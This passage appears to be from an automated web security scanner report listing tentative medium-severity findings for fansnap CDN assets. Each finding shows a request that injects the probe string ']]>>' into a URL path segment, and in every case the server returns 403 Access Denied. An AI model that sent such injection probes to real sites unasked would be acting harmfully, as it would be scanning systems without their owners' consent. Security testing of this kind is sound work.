<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7E17C63772594B09</RequestId><HostId>ElsQOXF8vl19UMV3W8Be5z/OKFKGKcFsclKeWtNVw0Ix5aM8K3
...[SNIP]...

8.218. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BE02BEE2ECA0B8AE
x-amz-id-2: bsr+PBVke4JmC/2UIbtWzTuNijwJc8PUdLQuFCl9l9Sn6PCg+ffH3hBWF7MTGgks
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:41 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5c360df236bfc0ba0324933754ae18ca3fee3dcafc4b9cf314dba79bc40a8fdf5c5ddcb5fc54de0b
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BE02BEE2ECA0B8AE</RequestId><HostId>bsr+PBVke4JmC/2UIbtWzTuNijwJc8PUdLQuFCl9l9Sn6PCg+f
...[SNIP]...

8.219. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2BC418B7F60EE037
x-amz-id-2: Vy/+6fNytnEjTiO5pqnFJ3PdgEJswu12QGBrJNlZtKi0111vs3WkY0xlm22q7AVz
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 091a72f545e2ef1f165504a91fbd221c9f1716d0302f8b295dc405befabf40596d3195e75938caa9
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2BC418B7F60EE037</RequestId><HostId>Vy/+6fNytnEjTiO5pqnFJ3PdgEJswu12QGBrJNlZtKi0111vs3
...[SNIP]...

8.220. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 209630181079E04A
x-amz-id-2: 9NNx5vJJT7rlnKQ9WD7nsChUvGtWDSKIpNGjm8CvugQwm8gcBtbCZgTOacjV2Idi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 837051c7482ca601773034702b3ba71f5e723e47f7eee842649384de03055cc908dc9f5429581988
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>209630181079E04A</RequestId><HostId>9NNx5vJJT7rlnKQ9WD7nsChUvGtWDSKIpNGjm8CvugQwm8gcBt
...[SNIP]...

8.221. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4E9E2819F31DCB39
x-amz-id-2: TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7KwvcWbS4pFCsQW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b20141431349f0083e79b1c95805e52d3aabcdc0f02f7784b35ed8a2a5715dbbfb1f1ff23f2eec5e
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4E9E2819F31DCB39</RequestId><HostId>TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7
...[SNIP]...

8.222. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8966D4E9FF5E403B
x-amz-id-2: 5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4M1Kvda3zb7TQ1k
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:30 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a718e20841ccd7b024ed990340776916976160c264c2f5033cbc5c36596f594bf27ec4fa80c03201
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8966D4E9FF5E403B</RequestId><HostId>5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4
...[SNIP]...

8.223. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 819A30940EB51C98
x-amz-id-2: SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5deyiZ81WqfXnLuKF9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:34 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 63c377054fd8f0abba6dea2a111f340728612c8700ce772419826244756a653fdbcbb878e01e5855
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>819A30940EB51C98</RequestId><HostId>SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5dey
...[SNIP]...

8.224. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9CB3E9864B675FF5
x-amz-id-2: m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHtXqQYi4B63yrzFi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Content-Length: 231
Age: 148
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 670a67f2c46ac9c411a2c99f9106bcbc55a6c3cb38fc78e8cb72f8eaa5570b8c2139807191cc4c27
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9CB3E9864B675FF5</RequestId><HostId>m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHt
...[SNIP]...

8.225. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets]]>>/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 03933044C122185D
x-amz-id-2: cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9/OU4aBC1elNPDy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
Age: 148
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 553ca38a194551ac4e0a7bf5b78bab0da13f8ddf764ad570dae672f9eeb607bc76272c6e026ad174
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>03933044C122185D</RequestId><HostId>cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9
...[SNIP]...

8.226. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css]]>>/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6F9EC97154F9BC8E
x-amz-id-2: 4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5PZGbjFEw9N9ay+r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
Age: 146
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 006c0b646cccd010d477e710bd00c5e18ef0f5bf60bf056439359e660df964a2e18ffe64b4f25510
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6F9EC97154F9BC8E</RequestId><HostId>4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5P
...[SNIP]...

8.227. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BD7EBEB28E2DF68E
x-amz-id-2: KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV8H6pc3LZh3vE9w
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
Age: 147
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c83e0ffcc4c770eaec40eeb5d25d7d4d19d0b66b4cbddf887153462193eb4e55946b7d1a8054fa86
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BD7EBEB28E2DF68E</RequestId><HostId>KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV
...[SNIP]...

8.228. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AC1028F694BFD3A7
x-amz-id-2: cgiy31T2j/iZwB5l4Dvb7wt0341h8+kzyc8nRqSRZc4TIQBwSk9mpxLDkbCDHa9u
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b75f4776c26d53116240d6fdc9284f9efe700527d810b7d436c4ae33a0cba7ecd860159420834b9
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AC1028F694BFD3A7</RequestId><HostId>cgiy31T2j/iZwB5l4Dvb7wt0341h8+kzyc8nRqSRZc4TIQBwSk
...[SNIP]...

8.229. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1418896566B2B222
x-amz-id-2: bkK5qXPlRlq9UiV6qyiPEgl9UODYV+/AHQY3gtP7g1hlf+igtPFLIZvN/Xw+HAe7
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 38912ede63b29e2810bbff2b12bc46bf0317761c7c2e22fddac6bdb8754d44efe35d4a09fa7bc1ab
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1418896566B2B222</RequestId><HostId>bkK5qXPlRlq9UiV6qyiPEgl9UODYV+/AHQY3gtP7g1hlf+igtP
...[SNIP]...

8.230. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6DD22A2EEB35073C
x-amz-id-2: HX+CILmNe/AlnP9fc5zL6Wj8TSTcD3Wv5oXdchf+9V1ap8CenrKL/VXHrqKeimcR
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:01 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 58e3834b4f04ab3dec08f8a078db788df2715fcaf8a18b20a42aba07cfba5682548f68f038d9f895
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6DD22A2EEB35073C</RequestId><HostId>HX+CILmNe/AlnP9fc5zL6Wj8TSTcD3Wv5oXdchf+9V1ap8Cenr
...[SNIP]...

8.231. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 821358FA1269FAEB
x-amz-id-2: K3h3ZkfMwrMReysxv0bcLfAsC58mxDchNsHjvFpBtFGGWH+59G3PqYIv71ARzuUq
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:05 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 75f7857d0214aa23ccfec61f621ce3771c8d9bd162b08456d860942a8ad7cd09c27e80c8d445eca0
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

